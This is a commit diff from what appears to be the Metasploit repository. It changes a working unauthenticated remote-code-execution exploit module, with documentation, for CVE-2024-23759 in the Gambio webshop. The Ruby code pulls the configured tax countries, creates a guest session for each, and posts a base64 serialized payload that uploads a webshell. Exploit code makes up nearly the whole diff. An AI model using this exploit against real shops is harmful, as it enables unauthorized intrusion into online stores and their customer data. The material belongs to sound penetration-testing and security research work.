update module and documentation with tax country logic

rapid7 · Apr 18, 2024 · 331c961 · 331c961
1 parent 9f50f12
commit 331c961
Show file tree

Hide file tree

Showing 2 changed files with 59 additions and 41 deletions.
diff --git a/documentation/modules/exploit/multi/http/gambio_unauth_rce_cve_2024_23759.md b/documentation/modules/exploit/multi/http/gambio_unauth_rce_cve_2024_23759.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 A Remote Code Execution vulnerability in Gambio online webshop version `4.9.2.0` and lower allows remote attackers
-to run arbitrary commands via unauthenticated HTTP POST request. Gambio version 3 is not vulnerable.
+to run arbitrary commands via unauthenticated HTTP POST requests. Gambio version 3 is not vulnerable.
 The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
 which ultimately allows an attacker to execute remote code on affected systems.
 
@@ -227,3 +227,5 @@ meterpreter > exit
 ## Limitations
 Gambio is also supported on Windows systems, however the admin access seems to be broken on the vulnerable versions.
 This causes the exploit not to run successfully.
+Another dependency is that one or more tax countries should be defined in the configuration of the application, otherwise
+guest users can not be created causing the exploit to fail. The default setup of the application has at least one tax country defined.
diff --git a/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb b/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb
@@ -153,47 +153,63 @@ def upload_webshell
     final_payload_b64 = Base64.strict_encode64(final_payload)
 
     # create guest user to get a valid session cookie
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
-      'keep_cookies' => true,
-      'vars_post' => {
-        'firstname' => firstname,
-        'lastname' => lastname,
-        'email_address' => email,
-        'email_address_confirm' => email,
-        'b2b_status' => 0,
-        'company' => nil,
-        'vat' => nil,
-        'street_address' => Rex::Text.rand_text_alpha_lower(8..12),
-        'postcode' => Rex::Text.rand_text_numeric(5),
-        'city' => Rex::Text.rand_text_alpha_lower(4..12),
-        'country' => 8,
-        'telephone' => Rex::Text.rand_text_numeric(10),
-        'fax' => nil,
-        'action' => 'process'
-      }
+    # country variable should match with a configured tax country in the gambio admin panel
+    # grab the available tax country code settings from the CreateGuest form page
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest')
     })
-    if res && res.code == 302
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),
-        'keep_cookies' => true,
-        'vars_post' => {
-          'checkout_started' => 0,
-          'search' => final_payload_b64,
-          'street_address' => Rex::Text.rand_text_alpha_lower(4..12),
-          'house_number' => Rex::Text.rand_text_numeric(1..2),
-          'additional_info' => nil,
-          'postcode' => Rex::Text.rand_text_numeric(5),
-          'city' => Rex::Text.rand_text_alpha_lower(8..12),
-          'country' => 'DE',
-          'firstname' => firstname,
-          'lastname' => lastname,
-          'postnumber' => Rex::Text.rand_text_numeric(6),
-          'psf_name' => Rex::Text.rand_text_alpha_lower(1..3)
-        }
-      })
+    if res && res.code == 200
+      html = res.get_html_document
+      unless html.blank?
+        country_tax_options = html.css('select[@id="country"]')
+        country_tax_options.css('option').each do |country|
+          print_status("code: #{country['value']}")
+          res = send_request_cgi({
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'),
+            'keep_cookies' => true,
+            'vars_post' => {
+              'firstname' => firstname,
+              'lastname' => lastname,
+              'email_address' => email,
+              'email_address_confirm' => email,
+              'b2b_status' => 0,
+              'company' => nil,
+              'vat' => nil,
+              'street_address' => Rex::Text.rand_text_alpha_lower(8..12),
+              'postcode' => Rex::Text.rand_text_numeric(5),
+              'city' => Rex::Text.rand_text_alpha_lower(4..12),
+              'country' => country['value'],
+              'telephone' => Rex::Text.rand_text_numeric(10),
+              'fax' => nil,
+              'action' => 'process'
+            }
+          })
+          next unless res && res.code == 302
+
+          res = send_request_cgi({
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'),
+            'keep_cookies' => true,
+            'vars_post' => {
+              'checkout_started' => 0,
+              'search' => final_payload_b64,
+              'street_address' => Rex::Text.rand_text_alpha_lower(4..12),
+              'house_number' => Rex::Text.rand_text_numeric(1..2),
+              'additional_info' => nil,
+              'postcode' => Rex::Text.rand_text_numeric(5),
+              'city' => Rex::Text.rand_text_alpha_lower(8..12),
+              'country' => 'DE',
+              'firstname' => firstname,
+              'lastname' => lastname,
+              'postnumber' => Rex::Text.rand_text_numeric(6),
+              'psf_name' => Rex::Text.rand_text_alpha_lower(1..3)
+            }
+          })
+          break
+        end
+      end
     end
     res
   end